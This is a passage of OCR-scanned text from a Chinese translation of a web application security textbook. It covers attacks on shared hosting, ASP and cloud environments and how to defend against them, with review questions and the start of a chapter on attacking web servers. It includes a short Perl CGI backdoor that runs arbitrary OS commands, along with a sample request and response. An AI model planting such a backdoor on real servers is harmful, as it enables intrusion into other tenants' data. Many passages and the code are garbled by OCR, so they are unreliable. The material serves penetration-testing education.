简单 的 共享 主机 配置 中 ， 一 台 Web 服 务 器 只 需要 支持 几 个 域名 各 不 
相同 的 虚拟 Web 站 点 。 它 通过 Host 消 息 头 达到 这 个 目的 ， 在 HITP 1.1 
中 ， 请 求 中 必须 包含 该 消息 头 。 当 浏览 器 提出 一 个 HTTP 请 求 时 ， 请 求 
中 即 包含 一 个 Host 消 息 头 ， 该 消息 头 中 含有 相关 UREL 中 的 域名 ; 然后 ， 
请 求 被 传送 到 与 域名 关联 的 IP 地 址 中 。 如 果 解 析 几 个 域名 得 到 相同 的 
PP 地 址 ， 在 这 个 地 址 上 的 服务 器 仍然 能 够 确定 请 求 希望 访问 哪 一 个 web 
站 点 。 例 如 ， 可 以 配置 Apache 使 用 以 下 配置 支持 几 个 Web 站 点 ， 这 个 配 
置 为 每 个 虚拟 主机 站 点 设 定 各 不 相同 的 Web 根 目录 。 




















<VirtualHost *> 
ServerName wahh-appl.com 
DocumentRoot /www/appl 
</VirtualHost> 


<VirtualHost *> 
ServerName wahh-app2.com 
DocumentRoot /www/app2 
</VirtualHost> 





17.2.2 ”共享 的 应 用 程序 服务 


许多 ASP 提 供 现 成 的 应 用 程序 ， 可 由 客户 修改 与 定制 后 使 用 。 对 于 
拥有 大 量 业 务 、 需 要 部 署 功能 强大 复杂 、 能 为 终端 用 户 提 供 基 本 相同 功 
能 的 应 用 程序 的 行业 ， 使 用 这 种 模型 可 以 节省 大 量 成 本 。 使 用 ASP 提 供 
的 这 种 服务 ， 商 家 可 迅速 获得 一 个 知名 品牌 的 应 用 程序 ， 而 且 不 必 投 入 
大 量 的 安装 与 维护 成 本 。 

在 金融 服务 行业 ，ASP 应 用 程序 市 场 特 别 成 熟 。 举 例 来 说 ， 在 某 个 
国家 ， 可 能 有 数 千 家 小 型 零售 商 希 望 问 顾客 提供 店内 支付 卡 与 信贷 服 
务 。 这 些 零售 商 将 这 项 服务 外 包 给 若干 不 同 的 信用 卡 提供 商 ， 其 中 许多 
提供 商 为 新 创办 的 企业 ， 而 非 历史 悠久 的 知名 银行 。 这 些 信 用 卡 提 供 商 
提供 一 种 商品 化 服务 ， 而 成 本 是 其 中 一 个 关键 的 竞争 因素 。 因 此 ， 许 多 
提供 商 使 用 一 家 ASP 为 终端 用 户 提供 Web 应 用 程序 。 因 此 ， 每 一 家 ASP 
都 对 相同 的 应 用 程序 进行 定制 处 理 ， 以 满足 大 量 不 同 零 售 商 的 需求 。 

图 17-5 说 明了 这 种 服务 的 典型 组 织 结构 与 责任 划分 。 从 不 同 代理 商 
与 相关 任务 的 角度 看 ， 这 种 服务 存在 与 共享 主机 基本 模型 相同 的 安全 问 
题 ， 但 这 些 问 题 可 能 更 复杂 。 而 且 ， 这 种 服务 还 存在 其 他 特殊 的 问题 ， 
如 17.2.3 节 所 述 。 
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图 17-5 一 家 典型 应 用 程序 服务 提供 商 的 组 织 结构 








17.2.3 ”攻击 共享 环境 


共享 主机 与 ASP 环 境 引 入 一 系列 新 的 潜在 漏洞 ， 攻 击 者 可 利用 它们 
针对 共享 基础 架构 中 的 一 个 或 几 个 应 用 程序 进行 攻击 。 
1. 针对 访问 机 制 的 攻击 

因为 各 种 外 部 组 织 需要 更 新 与 定制 共享 环境 中 的 不 同 应 用 程序 ， 提 
供 商 必须 执行 实现 这 种 远程 访问 的 机 制 。 在 最 简单 的 虚拟 主机 Web 站 点 
中 ，FTP 或 SCP 之 类 的 上 传 工 具 即 可 达到 这 种 目的 ， 客 户 通 过 它们 在 自 
己 的 Web 根 目录 中 写 入 文件 。 

如 果 主 机 服务 提供 一 个 数据 库 ， 客 户 可 能 需要 直接 访问 数据 库 ， 以 
配置 数据 库 设 置 ， 获 取 应 用 程序 保存 的 数据 。 这 时 ， 提 供 商 可 执行 一 个 
实现 某 些 数据 库 管理 功能 的 接口 ， 或 者 通过 因特网 提供 数据 库 服 务 ， 允 
许 客户 直接 建立 连接 ， 并 使 用 他 们 自己 的 工具 。 

在 成 熟 的 ASP 环 境 中 ， 各 种 类 型 的 客户 需要 对 共享 应 用 程序 的 组 件 
进行 不 同 程度 的 定制 ， 这 时 ， 提 供 商 通常 会 运行 功能 强大 的 应 用 程序 ， 
帮助 客户 完成 这 些 任务 。 通 常 ， 通 过 一 个 VPN (Virtual Private 
Network， 虚 拟 专用 网 络 ) 或 一 个 连接 ASP 基 础 架构 的 专用 连接 ， 就 可 
以 访问 这 些 应 用 程序 。 

根据 远程 访问 机 制 所 涵盖 的 范围 ， 攻 击 者 可 针对 共享 环境 实施 各 种 
不 同 的 攻击 。 


























口 远程 访问 机 制 本 身 并 不 安全 。 例 如 ，EFTP 协 议 未 加 密 ， 使 得 处 在 
适当 位 置 ( 例 如 ， 在 客户 自己 的 ISP A) 的 攻击 者 能 够 截获 登录 证 书 。 
访问 机 制 中 还 可 能 包含 未 打 补 丁 的 软件 漏洞 或 配置 缺陷 ， 使 得 匿名 攻击 
者 能 够 避 开 访问 机 制 ， 破 坏 客户 的 应 用 程序 和 数据 。 

口 远程 访问 机 制 许 可 的 访问 可 能 过 于 宽泛 ， 或 者 未 能 对 客户 进行 适 
当 的 隔离 。 例 如 ， 当 用 户 只 需要 文件 访问 时 ， 访 问 机 制 可 能 会 为 用 户 提 
供 一 个 命令 shell。 另 外 ， 访 问 机 制 可 能 并 没有 限制 客户 只 能 访问 目 己 的 
目录 ;相反 ， 却 允许 他 们 更 新 其 他 客户 的 内 容 ， 或 者 访问 服务 器 操作 系 
统 中 的 敏感 文件 。 

口 在 文件 系统 访问 方面 ， 同 样 的 注意 事项 也 适用 于 数据 库 。 访 问 机 
制 可 能 没有 对 数据 库 进 行 适当 的 隔离 ， 为 每 名 客户 提供 不 同 权限 的 账 
户 。 直 接 数据 库 连 接 可 能 使 用 标准 ODBC 之 类 的 非 加密 渠 着 来 实现 。 

口 如 果 部 著 一 个 定制 应 用 程序 实现 远程 访问 例如， 通过 一 家 
ASP) ， 这 个 应 用 程序 必须 负责 控制 不 同 客 户 对 共享 应 用 程序 的 访问 。 
管理 应 用 程序 中 存在 的 任何 漏洞 都 可 能 会 导致 恶意 客户 ， 甚 至 是 匿名 用 
己 破 坏 其 他 客户 的 应 用 程序 ， 还 会 使 拥有 有 限 权 限 的 客户 能 够 更 新 应 用 
程序 的 皮肤 ， 从 而 提升 其 权限 ， 或 者 修改 应 用 程序 核心 功能 组 件 ， 以 实 
现 他 们 的 目的 。 如 宋 部 团 了 这 种 类 型 的 管理 应 用 程序 ， 那 么 该 应 用 程序 
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2， 应 用 程序 间 的 攻击 

在 一 个 共享 主机 环境 中 ， 不 同 的 客户 通常 需要 向 服务 器 合法 上 传 并 
执行 任意 脚本 。 这 会 导致 单 主机 应 用 程序 中 并 不 存在 的 问题 。 

e 预 留 后 门 

在 最 明显 的 攻击 中 ， 恶 意 客户 可 能 会 上 传 攻击 服务 器 自身 或 其 他 客 
户 应 用 程序 的 内 容 。 例 如 ， 下 面 的 Pe 向 本 在 服务 器 上 运行 一 个 远程 人 
& THA: 























#! /usr/bin/perl 

use strict; 

use CGI gqw(:standard escapeHTML) ) ; 
print header, start_html(""); 


if (param()) {my $command = param("cmd") ; 
Scommand=* $command’ ; 


print "S$command\n"; } 
else {print start_form(); textfield({"command”") ;} 
print end_html; 


从 因特网 上 访问 以 下 这 上 段 脚本 ， 客 户 殊 能 够 在 服务 器 上 执行 任意 控 
作 系 统 命令 : 


GET /scripts/backdoor.pl?cmd=whoami HTTP/1.1 
Host: wahh-maliciousapp.com 


HTTP/1.1 200 OK 

Date: Sun, 03 Jul 2011 19:16:38 GMT 

Server: Apache/2.0.59 

Connection: close 

Content-Type: text/html; charset=ISO-8859-1 


<!DOCTYPE html 

PUBLIC °-//W3C//DTD XHTML 1.0 Transitional //EN" 

"http: //www.w3 .org/TR/xhtm11/DTD/xhtml11-transitional .dtd’> 

shtml xnlns="http://www.w3.0org/1999/xhtml" lang="en-US" snl: lang="en-U5S"> 
<head> 
<title>Untitled Document</title> 
<meta http-equlv="Content-Type”’ content="text/html; charset=Lso-8859-1" /> 
</head> 
<body> 
apache 
</body> 
</html> 


由 于 恶意 客户 的 命令 以 Apache 用 户 的 身份 执行 ， 这 很 可 能 使 得 该 客 
户 能 够 访问 属于 共 孚 主机 服务 其 他 客户 的 脚本 和 数据 。 
ASP 管理 的 共 邓 应 用 程序 中 也 存在 这 种 威胁 。 虽 然 核心 应 用 程序 功 


能 由 ASP 控 制 并 更 新 ， 但 个 体 用 户 还 是 能 够 以 茶 种 确定 的 方式 修改 这 项 
功能 ， 恶意 客户 可 以 在 他 们 控制 的 代码 中 引入 其 他 人 难以 妈 觉 的 后 门 ， 
从 而 攻破 共 至 应 用 程序 ， 访 问 其 他 客户 的 数据 。 


YY tem 后 门 脚本 可 以 用 大 多 数 Web 脚 本 语言 创建 。 欲 知 更 
多 以 其 他 语言 编写 的 脚本 实例 ， 请 访问 : http://net-square.com/ 
papers/one_way/one_way.html#4.0. 


@ 易 受 攻击 的 应 用 程序 间 的 攻击 

即使 共享 环境 中 的 所 有 客户 全 都 并 无 恶意 ， 且 仅 上 传经 过 环境 所 有 
者 确认 的 合法 脚本 ， 但 如 果 个 别 用 户 对 存在 于 应 用 程序 中 的 漏洞 并 不 知 
情 ， 应 用 程序 之 间 的 攻击 仍 有 可 发 生 。 在 这 种 情况 下 ， 和 恶意 用 户 可 以 
利用 某 个 应 用 程序 中 的 漏洞 攻破 该 应 用 程序 以 及 共 :部 环境 中 的 所 有 其 他 
应 用 程序 。 许 多 常见 的 漏洞 都 属于 这 种 类 型 ， 如 下 所 示 。 

口 攻击 者 可 以 利用 某 个 应 用 程序 中 的 SQL 注入 漏洞 在 共享 数据 库 中 
执行 任意 SQL 查询 。 如 果 没 有 完全 隔离 访问 数据 库 的 不 同 客 户 ， 攻 击 
者 就 可 以 读 取 并 修改 所 有 应 用 程序 使 用 的 数据 。 

口 攻 击 者 可 以 利用 某 个 应 用 程序 中 的 路 径 遍 历 漏洞 读 取 或 写 入 服务 
器 文件 系统 中 的 任意 文件 ， 包 括 那 些 属 于 其 他 应 用 程序 的 文件 。 

口 攻击 者 可 以 采用 与 前 面 描述 的 恶意 客户 使 用 的 方法 类 似 的 方法 ， 
利用 某 个 应 用 程序 中 的 命令 注入 漏洞 攻破 服务 器 以 及 服务 器 上 运行 的 其 
他 应 用 程序 。 

@ ASP 应 用 程序 组 件 间 的 攻击 

前 面 描述 的 各 种 攻击 全 部 可 能 会 在 共享 ASP 应 用 程序 中 发 生 。 由 于 
客户 可 以 按照 自己 的 需求 对 核心 应 用 程序 功能 进行 定制 ， 因 此 定制 应 用 
程序 的 用 户 可 以 利用 某 名 客户 引入 的 漏洞 攻击 主 共 享 应 用 程序 ， 从 而 窃 
取 所 有 ASP 客 户 的 数据 。 

除 这 些 攻 击 以 外 ， 由 于 共享 应 用 程序 的 各 种 组 件 必 须 彼 此 交互 ， 因 
而 恶意 客户 或 用 户 能 够 攻破 其 他 共享 的 应 用 程序 ， 如 下 所 示 。 

口 由 不 同 应 用 程序 生成 的 数据 通常 被 分 配 到 一 个 公共 的 位 置 ， 可 以 
被 共享 应 用 程序 中 拥有 较 高 权限 的 ASP 级 用 户 查 看 。 这 意味 着 攻击 者 可 
以 利用 定制 应 用 程序 中 存在 的 XSS 漏 洞 攻 破 共享 应 用 程序 。 例 如 ， 如 果 
攻击 者 能 够 在 日 志文 件 条 目 、 文 付 记 录 或 者 个 人 联系 信息 中 注入 
Javascript 代 码 ， 他 们 就 可 以 劫持 一 名 ASP 级 用 户 的 会 话 ， 从 而 访问 敏感 


























的 管理 功能 

口 ASP 通 各 使 用 一 个 共 胖 数据 库 保 存 所 有 客户 的 数据 。 应 用 程序 与 
数据 库 层 而 是否 对 数据 访问 实施 了 严格 的 隔离 这 一 点 无 法 确定 。 但 
Her Fev eme 种 情况 ， MEE EREA, 如 数据 库存 储 过 程 ， 
它们 负责 处 理 属于 多 名 客户 的 数据 。 恶 意 客 户 或 用 户 可 以 利用 这 些 组 件 
中 存在 的 有 缺陷 的 信任 关系 或 漏洞 访问 其 他 应 用 程序 中 的 数据 。 例如 ， 
一 个 定义 者 权限 共享 存储 过 程 中 的 SQL 注 入 漏洞 可 能 会 叶 致 整个 共享 数 
据 库 被 攻破 。 


























渗透 测试 步 又 


D 检查 为 共 诗 坏 境 中 的 客户 提供 的 、 便 于 他 们 更 新 和 管理 
内 容 与 功能 的 访问 机 制 。 考 虑 以 下 问题 。 





O 远程 访问 机 制 是 否 使 用 一 个 安全 的 协议 与 经 过 适当 强化 
的 基础 架构 ? 

口 客户 是 否 能 够 访问 他 们 正常 情况 下 不 能 访问 的 文件 、 数 
据 及 其 他 资源 ? 

口 洛 户 是 否 能 够 在 主机 环境 中 获得 一 个 交互 式 的 shell， 并 
执行 任意 命令 ? 


(2) 如 果 使 用 一 个 所 有 权 应 用 程序 ， 以 方便 客户 配置 和 定制 
共享 环境 ， 考 虑 是 否 能 够 以 这 个 应 用 程序 为 攻击 目标 ， 攻 破 该 环境 
本 身 及 其 中 运行 的 所 有 应 用 程序 。 

(3) 如 果 能 够 在 某 个 应 用 程序 中 执行 命令 、 注 入 SQL 脚本 或 
访问 任意 文件 ， 仔 细 研 究 ， 看 是 否 能 够 以 此 扩大 攻击 范围 ， 攻 破 其 
他 应 用 程序 。 

(4) 如 果 渗 透 测试 员 正 在 攻击 一 个 使 用 ASP 主 机 的 应 用 程 
序 ， 且 该 应 用 程序 由 许多 共享 与 定制 组 件 构 成 ， 确 定 其 中 的 任何 共 
享 组 件 ， 如 日 志 机 制 、 管 理 功 能 以 及 数据 库 代 码 组 件 ， 尝 试 利 用 这 
些 组 件 攻破 应 用 程序 的 共享 部 分 ， 进 而 攻破 其 他 应 用 程序 。 

(5) 如 果 所 有 共享 环境 使 用 一 个 常用 的 数据 库 ， 使 用 
NGSSquirrel 之 类 的 数据 库 扫描 工具 ， 对 数据 库 配 置 、 补 丁 级 别 、 
表 结 构 以 及 许可 进行 全 面 审查 。 数 据 库 安 全 模型 中 存在 的 任何 缺陷 
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3. 攻击 云 
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库 和 硬件 外 包 给 外 部 服务 提供 商 。 此 外 ， 它 也 指 目前 共享 托管 环境 的 高 
度 虚 拟 化 。 

从 广义 上 讲 ， 云 服务 是 指 提 供 API、 应 用 程序 或 用 于 客户 交互 的 
Web 界 面 的 基于 因特网 的 按 需 服务 。 通 常 ， 云 计算 提供 商会 存储 用 户 数 
据 或 处 理 业 务 逻 辑 来 提供 相关 服务 。 从 终端 用 户 的 角度 看 ， 传 统 的 桌面 
































应 用 程序 将 升级 为 基于 云 的 应 用 程序 ， 各 种 企业 可 能 会 用 按 需 服务 来 符 
代 所 有 服务 器 。 

在 迁移 到 云 服 务 的 过 程 中 ， 缺 乏 控制 是 一 个 经 癌 补 提 及 的 安全 问 
题 。 与 传统 的 服务 器 或 果 面 软件 不 同 ， 用 户 没 有 办 法 提前 评估 特定 云 服 
务 的 安全 性 ， 而 需要 将 管理 服务 和 数据 的 所 有 黄 任 区 给 第 三 方 。 对 企业 
而 言 ， 他 们 需要 将 更 多 控制 托付 给 东 个 环境 ， 而 该 环境 包含 的 风险 却 无 
法 完全 定性 或 量化 。 由 于 基于 Web 的 平台 并 不 像 传 统 的 客户 端 /服务 圳 可 
下 载 的 产品 那样 经 过 严格 的 测试 ， 因 此 ， 在 文 持 云 服务 的 Web 应 用 程序 
中 发 现 的 漏洞 也 往往 不 为 人 们 所 了 解 。 

这 种 对 缺乏 控制 的 担心 ， 与 当前 企业 在 选择 托管 服务 提供 商 、 或 用 
户 在 选择 Web 邮 件 服 务 丙 时 的 担忧 类似 。 但 是 ， 仅 仅 这 种 担忧 并 不 能 
映 云 计算 带 来 的 日 荔 严 重 的 安全 风险 。 攻 破 一 个 传统 的 Web 应 用 程 友 可 
能 会 影响 到 成 和 干 上 万 名 个 体 用 户 ， 但 攻破 云 服 务 却 可 能 影响 到 成 干 上 万 
名 云 订阅 用 户 及 其 用 户 群 体 。 虽 然 存在 缺陷 的 访问 控制 会 使 攻击 者 能 够 
未 授权 访问 工作 流程 应 用 程序 中 的 敏感 文 要 ， 但 在 云 目 助 服 务 应 用 程序 
中 ， 这 种 缺陷 可 能 会 导致 攻击 者 能 够 未 授权 访问 服务 器 或 服务 器 集群 。 
利用 管理 后 端 门户 云 服务 中 的 同一 漏洞 ， 攻 击 者 甚至 能 够 访问 整个 企业 
基础 架构 。 

@ Web 应 用 程序 角度 的 云 安 全 

由 于 定义 不 明确 ， 每 个 云 服务 提供 商 的 实施 方式 各 不 相同 ， 因 此 并 
没有 适用 于 所 有 云 体系 架构 的 漏洞 列表 。 但 是 ， 我 们 仍然 可 以 确定 一 些 
专门 针对 云 计 算 体系 染 构 的 主要 漏洞 区 域 。 
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O 注解 ”关于 云 安全 ， 人 们 经 常 提 到 的 一 种 防御 机 制 是 静态 
或 动态 数据 加 密 。 但 是 ， 在 这 种 情况 下 ， 加 密 只 能 提供 最 低 限度 的 
保护 。 如 17.1 节 所 述 ， 如 果 攻 击 者 避 开 应 用 程序 的 身份 验证 或 授权 
位 碍 ， 针 对 数据 提出 看 似 合法 的 请 求 ， 术 中 的 组 件 就 会 自动 调用 仁 
可 解密 功能 。 


@ 元 隆 系 统 

在 使 用 燃 生 成 随机 数字 时 ， 许 多 应 用 程序 依赖 操作 系统 的 功能 来 执 
行 这 一 操作 。 第 用 的 粒 源 大 多 与 系统 本 身 的 功能 有 关 ， 如 系统 正常 运行 
INTE, PRAKASH fe. MRR, aS cht A 
A Book a it AY DAB ne FE LE, EEE OCA HT E 
准确 地 预测 随机 数字 发 生 需 的 状态 。 





9 将 管理 工具 迁移 到 云 中 

用 于 配置 和 监视 服务 器 的 界面 是 企业 云 计算 服务 的 核心 应 用 。 对 用 
户 而 言 ， 该 界面 是 一 个 自助 环境 ， 通 常 是 最 初 用 于 内 部 服务 器 管理 的 工 
具 的 Web 版 本 。 以 前 连接 到 网 络 的 独立 工具 往往 缺乏 可 靠 的 会 话 管理 和 
访问 控制 机 制 ， 在 没有 预先 采用 基于 角色 的 隔离 的 情况 下 更 是 如 此 。 笔 
者 曾 发 现 一 些 将 令 牌 或 GUID 用 于 服务 器 访问 的 情况 。 在 其 他 情况 下 ， 
应 用 程序 仅仅 通过 序列 化 接口 来 调用 任何 管理 方法 。 

@ 功能 优先 的 方法 

和 大 多 数 新 技术 一 样 ， 云 服务 提供 商 采用 功能 优先 的 方法 来 吸引 新 
用 户 。 从 企业 的 角度 来 看 ， 云 环境 几乎 总 是 通过 上 自助 Web 应 用 程序 管 
理 。 用 户 获 得 一 系列 用 户 友好 的 方法 ， 并 通过 这 些 方法 来 访问 数据 。 云 
服务 通常 并 不 提供 功能 “退出 ”机 制 。 

9 基于 令 牌 的 访问 

用 户 需 要 定期 调用 大 量 云 资源 ， 为 此 ， 用 户 需 要 在 客户 端 上 存储 一 
个 永久 身份 验证 令 牌 ， 以 免 输 入 密码 ， 并 用 于 标识 设备 〈 相 对 于 用 
F) 。 如 果 攻 击 者 能 够 访问 该 令 牌 ， 束 可 以 借 此 访问 用 户 的 云 资源 。 

人 Web 存 储 

Web 存 储 是 云 计算 吸引 终端 用 户 的 优势 之 一 。 为 发 挥 效 率 ，Web 存 
储 必须 文 持 某 种 标准 的 浏览 器 或 浏览 器 扩展 、 一 系列 技术 和 HTTP 扩 展 
GE 

述 ) 。 

此 外 ， 域 上 的 Web 服 务 器 通常 可 以 通过 因特网 访问 。 如 果 某 个 用 户 
可 以 上 传 HTML 文 件 并 诱 使 其 他 用 户 访 问 其 上 传 的 文件 ， 他 就 可 以 攻破 
这 些 使 用 同一 服务 的 用 户 。 与 此 类 似 ， 攻 击 者 可 以 利用 Java 同 源 策略 并 
上 传 一 个 JAR 文 件 ， 从 而 在 该 文件 被 因特网 上 的 其 他 位 置 调用 时 实现 完 
全 的 双向 交互 。 


17.2.4 章 共 享 环 境 的 安 






































由 于 使 用 相同 工具 的 客户 可 能 怀 有 恶意 企图 ， 以 及 不 知情 的 客户 可 
能 无 意 中 在 环境 中 引入 漏洞 ， 因 此 ， 共 享 环 境 给 应 用 程序 安全 带 来 了 新 
的 威胁 。 为 解决 这 种 双重 威胁 ， 设 计 共 享 环 境 时 必须 仔细 处 理 客 户 访 
问 、 隔 离 与 信任 关系 ， 并 实施 并 不 直接 适用 于 单 主机 应 用 程序 的 控制 。 

1. 保障 客户 访问 的 安全 

无 论 疝 客 户 提供 何 种 机 制 来 帮助 他 们 维护 自己 控制 的 内 容 ， 痢 应 防 
止 这 种 机 制 被 第 三 方 和 恶意 客户 未 授权 访问 。 











O EW De] AL till DVS THE AS A, BEH E LA rE) E E 
术 ， 并 进行 充分 的 安全 强化 。 

口 仅 准予 个 体 用 户 最 低 的 访问 权限 。 例 如 ， 如 果 一 名 客户 需要 问 一 
台 虚 拟 主机 服务 器 上 传 脚 本 ， 瓯 应 仅 同 他 分 配 读 取 与 写 入 他 目 己 的 文档 
根 目录 的 访问 权限 。 如 果 需 要 访问 一 个 共 译 数据 库 ， 就 应 使 用 一 个 无 法 
访问 属于 其 他 客户 的 数据 或 其 他 组 件 的 低 权限 账户 进行 访问 。 

口 如 果 使 用 一 个 定制 的 应 用 程序 提供 客户 访问 ， 该 应 用 程序 必须 满 
人 
TA 0 

2. BAZIRE 
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能 。 因 此 ， 稳 定 可 靠 的 解决 方案 是 应 使 用 本 章 前 半 部 分 描述 的 架构 控制 
来 保护 共 孚 环境 及 其 客户 ， 避 免 受到 通过 不 当 内 容 实 施 的 攻击 。 这 要 求 
隔离 给 予 每 名 客户 的 功能 ， 确 保 将 任何 有 意 或 无 意 攻击 的 影响 限制 在 局 
部 ， 使 其 不 会 伤害 其 他 客户 。 

口 每 名 客户 的 应 用 程序 应 使 用 一 个 独立 的 操作 系统 账户 访问 文件 系 

统 ， 该 账户 仅 拥 有 读 取 与 写 入 应 用 程序 文件 路 径 的 权限 。 

口 强大 系统 功能 与 命令 的 访问 权限 应 仅 限 于 操作 系统 等 级 ， 且 应 只 

分 配 所 需 的 最 低 权限 。 

口 应 在 任何 共享 数据 库 中 实施 相同 的 保护 措施 。 应 为 每 名 客户 使 用 

I aaron 
己 的 数据 。 
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=> 注解 VF SELAMP HRA IE SE LIA Bek SE PHP ET 
式 来 限制 茶 个 恶意 或 易 受 攻击 脚本 的 潜在 影响 。 这 种 模式 防止 PHP 
脚本 访问 茶 些 强大 的 PHP 函 数 ， 将 对 其 他 函数 的 操作 实施 限制 《请 
参阅 第 19 章 了 解 相 关内 容 ) 。 然 而 ， 这 些 限 制 并 非 完全 有 效 ， 而 且 
非常 容易 避 开 。 虽 然 安 全 模式 能 够 提供 有 用 的 防御 ， 但 由 于 它 需 要 
操作 系统 信任 应 用 程序 层 ， 以 控制 它 的 操作 ， 因 此 ， 从 架构 上 讲 ， 
在 这 里 控制 恶意 或 易 受 攻击 的 应 用 程序 造成 的 影响 并 不 合适 。 由 于 
这 个 及 其 他 原因 ，PHP 6 以 后 的 版 本 删除 了 安全 模式 。 








YY ”提示 如 采 能 够 在 服务 器 上 执行 任意 PHP 命 令 ， 可 使 用 
phpinfo0 命 令 返 回 PHP 环 境 的 配置 信息 。 可 以 检查 这 些 信 息 ， 了 解 
PHP 是 否 激 活 安 全 模式 ， 以 及 其 他 配置 选项 如 何 影响 执行 的 操作 。 
请 参阅 第 19 章 了 解 更 多 详情 。 


3. 隔离 共享 应 用 程序 中 的 组 件 

在 ASP 环 境 中 ， 应 用 程序 包含 各 种 共享 与 定制 的 组 件 ， 这 时 应 在 各 
方 控制 的 组 件 之 间 实 施 信 任 边 界 。 如 宁 一 个 数据 库存 储 过 程 之 类 的 共 孚 
组 件 接收 从 东 一 名 客户 的 定制 组 件 发 出 的 数据 ， 那 么 束 不 应 信任 这 些 数 
据 ， 就 好 像 它 们 是 由 终端 用 户 送出 的 一 样 。 每 个 组 件 都 应 对 它 的 信任 边 
界 以 外 的 相 邻 组 件 进行 严格 的 安全 测试 ， 确 定 其 中 存在 的 、 攻 击 者 可 以 
利用 易 受 攻击 的 组 件 或 恶意 组 件 攻 破 其 他 应 用 程序 的 漏洞 。 应 特别 注意 


共享 日 志 与 管理 功能 。 
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Web 应 用 程序 架构 中 实施 的 安全 控制 可 帮助 应 用 程序 所 有 者 显著 改 
善 他 们 部 署 的 应 用 程序 的 安全 状态 。 但 是 ， 如 果 应 用 程序 架构 中 存在 缺 
KIRE, Boe wey A AVENE ey KBE, i “SE 
攻击 男 一 个 组 件 ， 最 终 攻破 整个 应 用 程序 。 

为 一 方面 ， 共 译 主 机 与 基于 ASP 的 环境 也 引发 了 一 系列 新 的 、 难 以 
解雇 的 安全 问题 ， 包 括 单 主机 应 用 程序 中 并 不 存在 的 信任 边界 。 如 有 果 攻 
击 者 想 要 攻击 共 至 环境 中 的 一 个 应 用 程序 ， 他 就 应 该 集中 精力 对 共 至 环 
境 实 施 攻击 ， 确 定 是 人 否 可 以 通过 其 中 的 茶 个 应 用 程序 攻破 这 个 环境 ， 或 
者 利用 一 个 易 受 攻击 的 应 用 程序 攻击 其 他 应 用 程序 。 








欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh. 

(1) 假设 受 攻击 的 应 用 程序 使 用 两 台 不 同 的 服务 器 : 一 台 应 用 程 
TEARS tA” G Sia Ee IH a 已 经 发 现 一 个 漏洞 ， 可 以 在 应 用 程序 服 
务 器 上 执行 任意 操作 系统 命令 。 是 否 可 以 利用 这 个 漏洞 获取 保存 在 数据 
库 中 的 敏感 应 用 程序 数据 ? 

(2) 在 男 外 一 种 情形 中 发 现 了 一 “个 SQL 注入 漏洞 ， 可 以 利用 它 在 
数据 库 服 务 器 上 执行 任意 操作 系统 命令 。 是 否 可 以 利用 这 个 漏洞 攻破 应 
用 程序 服务 器 ? 例如 ， 是 否 可 以 修改 保存 在 应 用 程序 服务 器 中 的 应 用 程 
序 脚 本 以 及 辐 用 户 返 回 的 内 容 ? 

(3) 在 攻击 共享 环境 中 的 一 个 Web 应 用 程序 时 ， 与 ISP 签 订 合 约 
后 ， 在 所 针对 的 同一 台 服 务 器 上 获得 了 一 些 Web 空 间 ， 可 以 同 其 中 上 传 
PHP 脚 本 。 

是 人 否 可 以 利用 这 种 情况 攻破 目标 应 用 程序 ? 

(4) Linux、Apache、MySQL 与 PHP 等 架构 组 件 常 安装 在 同一 台 物 
理 服务 器 上 。 为 何 这 样 做 会 削弱 应 用 程序 架构 的 安全 状况 ? 
ie 如 何 找到 证 据 来 证 明 所 攻击 的 应 用 程序 由 某 个 应 用 程序 服务 
是 供 商 托管 ? 














= 


攻击 Web 服 务 器 


= 任何 其 他 应 用 程序 一 样 ，Web 应 用 程序 也 依赖 于 文 持 它 的 其 他 


技术 栈 (technology stack) ， 包 括 Web 服 务 堪 、 操 作 系统 与 网 络 基础 架 
构 。 这 些 组 件 中 的 任何 一 个 都 可 能 成 为 攻击 者 的 目标 ， 应 用 程序 依赖 的 
技术 往往 可 使 攻击 者 能 够 完全 攻破 整个 应 用 程序 。 

本 书 主要 讨论 渗透 测试 员 如 何 攻 击 Web 应 用 程序 ， 因 此 大 多 数 上 述 
类 型 的 攻击 不 在 本 书 的 讨论 范围 之 内 ， 但 针对 Web 服 务 器 层 的 攻击 以 及 
相关 应 用 程序 层 的 防御 是 个 例外 。 内 联防 御 通 常用 于 保障 Web 应 用 程序 
的 安全 及 识别 攻击 。 避 开 这 些 防 御 是 攻破 应 用 程序 的 关键 步骤 。 

迄今 为 目 ， 我 们 并 未 对 Web 服 务 器 与 应 用 程序 服务 器 进行 区 分 ， 
为 各 种 攻击 主要 针对 的 是 应 用 程序 的 功能 ， 无 论 应 用 程序 以 何 种 方式 提 
供 这 些 功能 。 实 际 上 ， 大 部 分 表示 层 、 与 后 端 组 件 的 通信 ， 以 及 核心 安 
全 框架 都 可 能 由 应 用 程序 容器 管理 。 这 就 进一步 扩大 了 攻击 范围 。 很 明 
显 ， 如 果实 现 这 些 框架 的 技术 存在 任何 漏洞， 可 用 于 直接 攻破 应 用 程 
序 ， 这 些 漏洞 将 会 引起 攻击 者 的 关注 。 

本 章 主要 讨论 如 何 利 用 Web 服 务 嚣 中 存在 的 漏洞 攻击 其 上 运行 的 
Web 应 用 程序 。 当 攻击 Web 服 务 器 时 ， 渗 透 测 试 员 可 以 利用 的 漏洞 分 为 
两 大 类 : 服务 器 配置 缺陷 和 应 用 程序 服务 器 软件 中 的 安全 漏洞 。 相 关 漏 
洞 的 列表 可 能 并 不 全 面 ， 因 为 这 类 软件 总 是 在 不 断 变化 ， 但 本 章 介 绍 的 
漏洞 将 说 明 各 种 应 用 程序 在 执行 自己 的 本 地 扩展 、 模 块 或 API， 或 访问 
外 部 功能 时 可 能 过 到 的 常见 危险 。 

在 本 章 中 ， 我 们 还 将 分 析 Web 应 用 程序 防火 墙 ， 介 绍 其 优 缺 点 ， 并 
详细 说 明 如 何 突破 这 些 防火 墙 以 实施 攻击 的 常用 方法 。 














18.1 Webi 445 Ac S ik 


即使 最 简单 的 Web 服 务 器 也 带 有 大 量 控制 其 行为 的 配置 选项 。 以 前 
发 布 的 许多 服务 咒 含 有 不 安全 的 默认 选项 ， 如 果 不 对 它们 进行 强化 ， 可 
能 会 使 攻击 者 有 机 可 乘 。 


18.1.1 默认 证 书 


许多 Web 服 务 器 包含 可 被 公众 访问 的 管理 接口 。 这 些 接口 可 能 位 于 
Web 根 目录 的 某 个 特定 位 置 ， 或 者 在 8080 或 8443 端 口上 运行 。 通 常 ， 管 
理 接口 使 用 众所周知 的 默认 证 书 ， 这 些 证 书 在 安装 时 不 需要 进行 修改 。 

一 些 最 常见 的 管理 接口 的 默认 证 书 如 表 18-1 所 示 。 











